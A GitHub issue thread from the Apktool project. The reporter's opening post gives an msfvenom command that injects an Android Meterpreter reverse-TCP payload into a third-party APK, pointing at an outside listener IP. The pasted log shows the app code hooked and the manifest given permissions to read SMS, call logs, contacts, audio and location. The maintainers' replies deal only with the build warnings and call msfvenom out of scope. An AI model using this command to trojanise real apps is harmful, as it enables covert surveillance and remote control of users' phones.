### ISSUE TITLE
W: res/drawable-anydpi-v24/$appc_info_app_bar_guy__0.xml: Invalid file name: must contain only [a-z0-9_.]

### ISSUE THREAD

**Issue by A-non-aa** [iBotPeaches/Apktool#2750]
msfvenom -x idea.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.24 LPORT=4483 -o myidea.apk                                                           
Using APK template: idea.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package cm.aptoide.pt.ennks
[*] Loading /tmp/d20220126-23451-4ck1ug/original/smali/cm/aptoide/pt/NotificationApplicationView.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220126-23451-4ck1ug/output.apk
[-] I: Using Apktool 2.5.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/linux/aapt_64 (defaulting to $PATH binary)
W: res/drawable-anydpi-v24/$appc_info_app_bar_guy__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$appc_info_app_bar_guy__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_hide_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_hide_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_hide_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_show_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_show_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_show_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_aptoide_email__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_beta__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_calendar__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_calendar__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_calendar__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_check__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__3.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__4.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__5.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__6.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__7.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_no_promotion_illustration__8.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_pause_to_resume__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_pause_to_resume__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_pause_to_resume__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_pause_to_resume_white__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_pause_to_resume_white__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_pause_to_resume_white__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_promotion_coins__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_resume_to_pause__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_resume_to_pause__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_resume_to_pause__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_resume_to_pause_white__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_resume_to_pause_white__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$ic_resume_to_pause_white__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_spend_appc__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_spend_appc__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_spend_appc__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_spend_appc__3.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_spend_appc__4.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_spend_appc__5.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$ic_update_image__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-anydpi-v24/$spend_get_appc_icon__0.xml: Invalid file name: must contain only [a-z0-9_.]
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [aapt, p, --min-sdk-version, 16, --target-sdk-version, 25, --version-code, 10112, --version-name, 9.20.2.2, --no-version-vectors, -F, /tmp/APKTOOL259114381012454997.tmp, -0, resources.arsc, -0, png, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20220126-23451-4ck1ug/original/res, -M, /tmp/d20220126-23451-4ck1ug/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

**Comment by pashamcr** [comment]
Use apktool 2.6.0 https://github.com/iBotPeaches/Apktool/releases/tag/v2.6.0:
`usage: apktool b[uild] [options] <app_path>`
The use of msfvenom is outside the scope of this project.

**Comment by iBotPeaches** [comment]
Those are additionally warnings in the output above. I kept the warning for folks to know, but it wouldn't affect build. Not enough details to work from here.
